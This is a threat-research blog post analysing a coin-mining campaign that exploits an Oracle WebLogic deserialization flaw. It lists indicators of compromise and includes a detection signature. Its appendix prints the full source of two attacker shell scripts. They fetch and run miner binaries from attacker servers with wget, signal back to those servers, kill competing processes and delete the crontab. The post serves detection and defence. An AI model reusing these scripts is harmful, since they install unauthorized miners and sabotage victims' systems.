Coin Mining by Opportunistic and Automated Threats

January 12, 2018

By: Justin Warner
  • Tags:
  • coin mining
  • Cryptocurrency
  • Threat Research

With the recent surge in popularity and increasing value of cryptocurrency, it should be no surprise that financially motivated threat actors have begun leveraging their victims to contribute to “mining” efforts, where the computing resources of the victim are used to generate cryptocurrency for the threat actor. To succeed in making a large profit, the actors must continually compromise a large number of victims and utilize significant computing resources. This demand for mass compromise has forced these threat actors to adopt automated methods that rely on opportunistic exploitation to outpace defenders, increasing the number of victims as quickly as possible with minimal cost.

While on the surface, the business impact from coin mining seems minimal, having an unauthorized party in control of systems you own introduces a dangerous wild card. Is it really a criminal performing coin mining or is that a disguise? What will they do with the access if coin mining is no longer profitable? ICEBRG has witnessed incidents stemming from criminals who decided to sell their access to other parties, and the increasingly common malware-as-a-service scheme contributes to the risk from “simple” coin mining. Simply stated, criminal post-exploitation has become an efficient and wide-spread business that poses a threat to all enterprises, especially those with a significant and historical internet footprint that may contain undocumented or obsolete systems and pages. In this post, we will provide a walkthrough of an attack campaign that ICEBRG has witnessed in the wild over the past several weeks and break down some key lessons learned from the attack.

Attack Walkthrough

Exploitation

Attackers primarily rely on opportunistic exploitation of well known (and signatured) vulnerabilities in applications running on internet connected systems, and exhibit complete disregard for stealth or disguise. Throughout the recently observed campaign, attackers originating from multiple source addresses (191.101.180[.]84, 72.11.140[.]178) leveraged CVE-2017-10271, a java deserialization vulnerability in the Oracle WebLogic Server, to target outdated servers (Figure 1). Java deserialization vulnerabilities are not unique to Oracle, and plague several older versions of WebSphere, JBoss, Jenkins, OpenNMS, etc. In this class of vulnerability, server software attempts to deserialize untrusted content without validation allowing an attacker to abuse the application for code execution.

Figure 1

Figure 1: Connections from an external untrusted entity with suspicious referrer to an exposed vulnerable Oracle WebLogic endpoint

Tool Staging

Following exploitation of the system, the threat actor downloads and executes a shell script from their command and control (C2) server using Wget. Throughout the campaign, we observed several variations of the same tool (Figure 2), each progressively adding capabilities or cleanup mechanisms. This indicates the possibility that the tool is either a public script that is getting reused and built upon, or that this campaign is more far-reaching than ICEBRG has independently observed to this point.

Identifier

Hosted URL

SHA1 Hash

Version A

http://72.11.140[.]178/setup-watch

df62241026a96cda6057d894000de8ed70b3b666

Version B

http://191.101.180[.]84:80/robots.txt

4c3f1cc052f7216447df8954a55e373bdf2ecefc

Figure 2: Versions of scripts seen by ICEBRG in recent campaigns

In Version B, ICEBRG has observed, the script performs two major actions: cleanup and staging of tools. During the cleanup routine, the script performs extensive attempts to prevent multiplicative effects, killing active processes of previously running code, other coin miners on the system, or system utilities that might be used to detect the action. During the staging phase, the script runs two similar routines to download two different files from different URIs, provide executable permissions, and attempt execution of these files. Both files are downloaded to the path ‘/tmp/xfsallocd’. The script sends a follow-on signal to the controller via an HTTP request from the download utility to a specific URI to indicate whether the file was already running or successfully started. Figure 3 shows the complete network staging process without the signal for successful execution. For a complete review of the source code, please reference Appendix B.

Figure 3

Figure 3: Complete staging process without execution signal

Profit

The executable binaries that are downloaded during staging are publicly known and identified Monero Coin Miners (Figure 4). Analysis of the binaries show they are using the standard stratum connection string “stratum+tcp://pool.minexmr.com:80” with a wallet ID of “4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMFAeUvoL3MFeTE6zwwHkFPrAyNw2JHDxUSWL82RiZThPpk4SEg7Vqe”. Analysis of the wallet associated with this activity shows that the threat actor/s have been paid out a total of 603.535663865 XMR, which, at the current exchange rate, equates to approximately $260,000 (note that, with cryptocurrency price fluctuations, this number is purely a point in time estimate).

Download URI

Local File Name

SHA1 Hash

$HOST/files/l/default

/tmp/xfsallocd, /tmp/watch-smartd

f79a2ba735a988fa6f65988e1f3d39684727bdc4

$HOST/files/l/others

/tmp/xfsallocd, /tmp/watch-smartd

7c57c61664f2b2373f755f22db9c156a1ca80849

Figure 4: Binaries that have been observed staging during the campaign

It is also worth noting that as of Jan 4, 2017, AlienVault published a signature to the public Emerging Threats feed (Figure 5) to identify activity with the associated wallet ID for this threat actor.

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS CoinMiner? Malicious Authline Seen After CVE-2017-10271 Exploit"; flow:established,to_server; content:"{|22|id|22 3A|"; depth:6; content:"|22|method|22 3a 20 22|mining.authorize|22 2c|"; within:100; content:"|22|params|22|"; within:50; content:"|5b 22|4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMFAeUvoL3MFeTE6zwwHkFPrAyNw2JHDxUSWL82RiZThPpk4SEg7Vqe|22 2c 20 22|"; distance:0; metadata: former_category CURRENT_EVENTS; reference:url,otx.alienvault.com/pulse/5a4e1c4993199b299f90a212; classtype:trojan-activity; sid:2025186; rev:1; metadata:attack_target Web_Server, deployment Datacenter, signature_severity Major, created_at 2018_01_04, malware_family CoinMiner?, performance_impact Low, updated_at 2018_01_04;)  

Figure 5: Emerging Threats Signature ID 2025186

ICEBRG Analysis

As part of our investigations, ICEBRG analysts were able to identify additional related activity across our customer space and in the public domain. The primary points of pivot were signatures developed to match the Linux scripts, infrastructure analysis, open source intelligence gathering, and the wallet ID tied to the threat actor observed in the aforementioned campaign. By pivoting on these indicators, ICEBRG discovered the following:

  • Fourteen additional Linux shell script variants that had variations of the downloader string, host IP address, and coin miner file paths

  • Three variants of Windows PowerShell scripts that mirror the functionality of the observed Linux scripts

  • Two additional servers performing exploitation activity

  • Thirteen Windows XMRig coin miner variants customized for this campaign

All indicators discovered during this activity are provided and identified in Appendix A.

Lessons Learned

It is easy to look at this relatively simple activity and make a judgement of the attackers tradecraft—almost too simple for an enterprise to be susceptible to this type of activity. However, criminals are able to compromise a large number of victims and profit from the activity. The above reillustrates that:

  • Visibility and knowledge of your internet footprint is vital

  • Multi-layered detection strategies provide a robust means to discover malicious activity

  • Forensics and root cause analysis are critical for long term continuity of business operations during incidents

Visibility and knowledge of your internet footprint is vital

If the successful exploitation of outdated and exposed assets provides the threat actor a form of revenue, it is likely they will continue to use these techniques. Knowledge of your asset inventory, application versioning, and attack surface will help you to better prevent, detect, and respond. In the case of many outdated or legacy *nix-based systems, it is unlikely that any sort of endpoint detection or response software will be supported, increasing the need for widespread network visibility and accountability over these endpoints.

Multi-layered detection strategies provide a robust means to discover malicious activity

Simply alerting on the IOCs provided in this post will serve as an initial layer of detection, but organizations should strive for more reliable indicators of malicious activity. In the case of this specific incident, there are numerous key detection points. Examples of these include:

  • Atomic Indicators: Threat intelligence matching on the servers, threat intel matching on the downloaded binaries, coin mining network activity, etc.

  • Complex Indicators: Executables downloaded with a suspicious user-agent, interaction with internet exposed systems from “newly observed” low-reputation entities, executables download immediately following an exploit attempt, etc.

Forensics and root cause analysis are critical for long term continuity of business operations during incidents

Even if successfully detected, a failure to contain or remediate the activity will likely lead to continued exploitation. In the case of interactive threat actors, an incomplete remediation will also provide a significant tip-off of your knowledge of their presence. Consider the scenario where you detect the activity, perform forensics to validate that no additional exploitation has occurred, and move to reimage the system for business continuity. Proper removal can be a time consuming and intricate process that may be best handled by bringing in an Incident Response team to ensure complete remediation.


ICEBRG is a network security analytics company that offers a SaaS capability that enables customers to gain and utilize widespread network visibility for security operations. Our Security Research Team (SRT) researches and prototypes detection and investigation capabilities for the ICEBRG platform to deliver targeted insights into network threat activity to our customers.

As part of its research, ICEBRG coordinates disclosure of security threats and vulnerabilities with relevant parties in order to maximize both the response and victim remediation efforts as well as working to truly improve the security of customers and other victims prior to publishing blog posts. The aforementioned activity lead to the discovery of technical intelligence and detection logic that is now contributing to the protection of all ICEBRG customers.

For additional information about this post or to learn more about how ICEBRG helps our customers defend against a wide range of threats, reach out to [email protected].


Attachment A: Indicators of Compromise

Indicator

Type

Description

72.11.140[.]178

IP Address

Server for exploitation and tool staging observed by ICEBRG

72.11.140[.]179

IP Address

Server for exploitation and tool staging identified via secondary analysis

72.11.140[.]180

IP Address

Server for exploitation and tool staging identified via secondary analysis

191.101.180[.]84

IP Address

Server for exploitation and tool staging identified via secondary analysis

/files/l/default

URI

URI of “default” coin mining malware

/files/l/others

URI

URI of “others” coin mining malware

carbon

Filename

Name of downloaded file, typically in /tmp or working dir

infoed

Filename

Name of downloaded file, typically in /tmp or working dir

ksxworker

Filename

Name of downloaded file, typically in /tmp or working dir

rcp_bh

Filename

Name of downloaded file, typically in /tmp or working dir

watch_smartd

Filename

Name of downloaded file, typically in /tmp or working dir

xfsallocd

Filename

Name of downloaded file, typically in /tmp or working dir

xlog-daemon

Filename

Name of downloaded file, typically in /tmp or working dir

9c2d266e880848a3f08dcceee0d27a660c521ac5

SHA1 Hash

Hash of script delivered via exploit identified via secondary analysis

ca9fad2fe12b5231ae42f507afbb00a742b2e3d2

SHA1 Hash

Hash of script delivered via exploit identified via secondary analysis

abc8be4e557107e80c1c342b7505dd3d2e47ef7f

SHA1 Hash

Hash of script delivered via exploit identified via secondary analysis

e843c894d837a41f5f9f2bcf932d1c5e49afe08b

SHA1 Hash

Hash of script delivered via exploit identified via secondary analysis

07133903f1c38e653e39f9877dca9575699e807d

SHA1 Hash

Hash of script delivered via exploit identified via secondary analysis

68039309925c8804fa745173cc8805938f3e3184

SHA1 Hash

Hash of script delivered via exploit identified via secondary analysis

25c804e082a4adc01bfcbc19704f541c7026fa9b

SHA1 Hash

Hash of script delivered via exploit identified via secondary analysis

0b4f904cebd469abff43f0457ab6a77466453173

SHA1 Hash

Hash of script delivered via exploit identified via secondary analysis

c0b76bca13da6989f05c4aeac59029c3987d7f98

SHA1 Hash

Hash of script delivered via exploit identified via secondary analysis

3909125fd2ddca0aff8130115ef8b870e508e795

SHA1 Hash

Hash of script delivered via exploit identified via secondary analysis

348d1b3a54dc89250531258fe822e3a948dbc071

SHA1 Hash

Hash of script delivered via exploit identified via secondary analysis

b4771410fe5bf3825df41735820aeaeff3c685bb

SHA1 Hash

Hash of script delivered via exploit identified via secondary analysis

13736cfc4df64a9890c4474f0003a54a8b72ffe2

SHA1 Hash

Hash of script delivered via exploit identified via secondary analysis

5249dadfea25acaeb66a0f1798ac2f09a41f2449

SHA1 Hash

Hash of script delivered via exploit identified via secondary analysis

df62241026a96cda6057d894000de8ed70b3b666

SHA1 Hash

Hash of script delivered via exploit observed by ICEBRG

4c3f1cc052f7216447df8954a55e373bdf2ecefc

SHA1 Hash

Hash of script delivered via exploit observed by ICEBRG

f79a2ba735a988fa6f65988e1f3d39684727bdc4

SHA1 Hash

Hash of downloaded coinminer tool “default” observed by ICEBRG

7c57c61664f2b2373f755f22db9c156a1ca80849

SHA1 Hash

Hash of downloaded coinminer tool “other” observed by ICEBRG

73f9eff7c66df6e5d3c7ff113e9c8bbc7436d47c

SHA1 Hash

Hash of PowerShell variant A identified via secondary analysis

3b348578d15080856b869937240899a71bc4f0da

SHA1 Hash

Hash of PowerShell variant B identified via secondary analysis

8a8a606f7b2c5efca11c7a7d3d692d5c36a19a7b

SHA1 Hash

Hash of PowerShell variant C identified via secondary analysis

d0cee3f54e6768520d5b96337fcfe6e217567ed7

SHA1 Hash

XMRig CPU Miner (Windows) identified via secondary analysis

176d27189aa72330ef2676c8fbee939c6a0ddea2

SHA1 Hash

XMRig CPU Miner (Windows) identified via secondary analysis

auto-upgrade.exe

Filename

Windows filename for XMRig. Stored in path ‘$env:TMP’

/files/w/default

URI

URI of hosted “default” XMRig binary for Windows

/files/w/others

URI

URI of hosted “other” XMRig binary for Windows

2384c36517e300628a040393b05a546ede2808e0

SHA1 Hash

XMRig CPU Miner (Windows) identified via secondary analysis

176d27189aa72330ef2676c8fbee939c6a0ddea2

SHA1 Hash

XMRig CPU Miner (Windows) identified via secondary analysis

43a2535e11d8ba03f6347e324bee93125c7d6cf6

SHA1 Hash

XMRig CPU Miner (Windows) identified via secondary analysis

bc30a4d02155a65cc79697b6e1a5d224e59bbfc7

SHA1 Hash

XMRig CPU Miner (Windows) identified via secondary analysis

7495514ddc01d262c46b0886a7ce9d9eca334b33

SHA1 Hash

XMRig CPU Miner (Windows) identified via secondary analysis

d0cee3f54e6768520d5b96337fcfe6e217567ed7

SHA1 Hash

XMRig CPU Miner (Windows) identified via secondary analysis

7ca8f4b97693d5612106b270bffc86c0ecc21649

SHA1 Hash

XMRig CPU Miner (Windows) identified via secondary analysis

9534f9e94a2b6b7752685a7634d3f904b5fbb3ae

SHA1 Hash

XMRig CPU Miner (Windows) identified via secondary analysis

05ee995cf49feee849a356fcd93c37260fa44fa2

SHA1 Hash

XMRig CPU Miner (Windows) identified via secondary analysis

df8aa574bf020e289707e4dc78d9ca053bfafe67

SHA1 Hash

XMRig CPU Miner (Windows) identified via secondary analysis

ab5ef923bc35cac25374716468c3b739cd688b9a

SHA1 Hash

XMRig CPU Miner (Windows) identified via secondary analysis

de136240b00ed289c29dbde7fcf99313acad458f

SHA1 Hash

XMRig CPU Miner (Windows) identified via secondary analysis

2e4a31a68fd27f9435c326988e614b46e196a32d

SHA1 Hash

XMRig CPU Miner (Windows) identified via secondary analysis

Differential analysis of Linux shell scripts:

SHA1 Hash

Downloader

Host

Local File

9c2d266e880848a3f08dcceee0d27a660c521ac5

curl

72.11.140[.]178

/tmp/rcp_bh

ca9fad2fe12b5231ae42f507afbb00a742b2e3d2

wget -q -O -

72.11.140[.]178

/tmp/infoed

abc8be4e557107e80c1c342b7505dd3d2e47ef7f

wget -q -O -

191.101.180[.]84

`pwd`/xfsallocd

/tmp/xfsallocd

e843c894d837a41f5f9f2bcf932d1c5e49afe08b

wget -q -O -

191.101.180[.]84

`pwd`/xfsallocd

/tmp/xfsallocd

07133903f1c38e653e39f9877dca9575699e807d

wget -q -O -

72.11.140[.]178

/tmp/carbon

68039309925c8804fa745173cc8805938f3e3184

curl

72.11.140[.]178

/tmp/infoed

25c804e082a4adc01bfcbc19704f541c7026fa9b

wget -q -O -

72.11.140[.]180

`pwd`/xlog-daemon

0b4f904cebd469abff43f0457ab6a77466453173

wget -q -O -

72.11.140[.]178

/tmp/rcp_bh

c0b76bca13da6989f05c4aeac59029c3987d7f98

wget -q -O -

191.101.180[.]84

`pwd`/xfsallocd

/tmp/xfsallocd

3909125fd2ddca0aff8130115ef8b870e508e795

curl

191.101.180[.]84

/tmp/xfsallocd

348d1b3a54dc89250531258fe822e3a948dbc071

wget -q -O -

72.11.140[.]178

`pwd`/rcp_bh

b4771410fe5bf3825df41735820aeaeff3c685bb

curl

72.11.140[.]178

/tmp/infoed

13736cfc4df64a9890c4474f0003a54a8b72ffe2

curl

72.11.140[.]178

`pwd`/rcp_bh

5249dadfea25acaeb66a0f1798ac2f09a41f2449

wget -q -O -

72.11.140[.]179

/tmp/ksxworker

df62241026a96cda6057d894000de8ed70b3b666

wget -q -O -

72.11.140[.]178

/tmp/watch-smartd

4c3f1cc052f7216447df8954a55e373bdf2ecefc

wget -q -O -

191.101.180[.]84

/tmp/xfsallocd


Attachment B: Script Source Code

Version A

HOST=72.11.140.178

CALLBACK=$HOST

# DOWNLOADER="curl "

DOWNLOADER="wget -q -O - "

DEFAULT_RFILE=$HOST/files/l/default

OTHERS_RFILE=$HOST/files/l/others

LFILE_NAME="watch-smartd"

# LFILE_PATH=`pwd`/$LFILE_NAME

LFILE_PATH=/tmp/$LFILE_NAME

DEFAULT ()

{

 $DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH

 chmod +x $LFILE_PATH

 ps -ef|grep $LFILE_NAME|grep -v grep

 if [ $? -ne 0 ]; then

   $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60"

 else

   $DOWNLOADER "${CALLBACK}/?info=l69"

 fi

}

OTHERS ()

{

 $DOWNLOADER $OTHERS_RFILE > $LFILE_PATH

 chmod +x $LFILE_PATH

 ps -ef|grep $LFILE_NAME|grep -v grep

 if [ $? -ne 0 ]; then

   $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30"

 else

   $DOWNLOADER "${CALLBACK}/?info=l39"

 fi

}

DEFAULT || OTHERS

Version B

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

HOST=191.101.180.84

CALLBACK=$HOST

# DOWNLOADER="curl "

DOWNLOADER="wget -q -O - "

LFILE_NAME="xfsallocd"

# LFILE_PATH=`pwd`/$LFILE_NAME

LFILE_PATH=/tmp/$LFILE_NAME

DEFAULT_RFILE=$HOST/files/l/default

OTHERS_RFILE=$HOST/files/l/others

CLEAN ()

{

 RMLIST=(/tmp/*index_bak* /tmp/*httpd.conf* /tmp/*httpd.conf /tmp/a7b104c270 /tmp/Carbon)

 KILIST=(sb1 wipefs AnXqV.yam [email protected] monerohash.com /tmp/a7b104c270 stratum.f2pool.com:8888 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQt989KEfGRt6Ww2Xg8 46SDR76rJ2J6MtmP3ZZKi9cEA5RQCrYgag7La3CxEootQeAQULPE2CHJQ4MRZ5wZ1T73Kw6Kx4Lai2dFLAacjerbPzb5Ufg 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe xmrpool.eu mine.moneropool.com xmr.crypto-pool.fr:8080 xmr.crypto-pool.fr:3333 xmr.crypto-pool.fr:6666 xmr.crypto-pool.fr:7777 xmr.crypto-pool.fr:443)

 for item in ${RMLIST[@]}

 do

     rm -rf $item

 done

 for item in ${KILIST[@]}

 do

     ps auxf|grep -v grep|grep $item|awk '{print $2}'|xargs kill -9

 done

 days=$(($(date +%s) / 60 / 60 / 24))

 ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "Silence"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9a5XEHZ"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "t.sh"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "wipefs"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "carbon"|awk '{print $2}'|xargs kill -9

 pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4

 pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB

 pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df

 pkill -f cpuloadtest

 pkill -f crypto-pool

 pkill -f xmr

 pkill -f prohash

 pkill -f monero

 pkill -f miner

 pkill -f nanopool

 pkill -f minergate

 pkill -f yam

 pkill -f Silence

 pkill -f yam2

 pkill -f minerd

 pkill -f Circle_MI.png

 pkill -f curl

 ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "44pgg5mYVH6Gnc7gKfWGPR2CxfQLhwdrCPJGzLonwrSt5CKSeEy6izyjEnRn114HTU7AWFTp1SMZ6eqQfvrdeGWzUdrADDu"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9

 ps auxf|grep -v grep|grep "11231"|awk '{print $2}'|xargs kill -9

}

DEFAULT ()

{

 $DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH

 chmod +x $LFILE_PATH

 ps -ef|grep $LFILE_NAME|grep -v grep

 if [ $? -ne 0 ]; then

   $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60"

 else

   $DOWNLOADER "${CALLBACK}/?info=l69"

 fi

}

OTHERS ()

{

 $DOWNLOADER $OTHERS_RFILE > $LFILE_PATH

 chmod +x $LFILE_PATH

 ps -ef|grep $LFILE_NAME|grep -v grep

 if [ $? -ne 0 ]; then

   $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30"

 else

   $DOWNLOADER "${CALLBACK}/?info=l39"

 fi

}

CLEAN

DEFAULT || OTHERS

crontab -r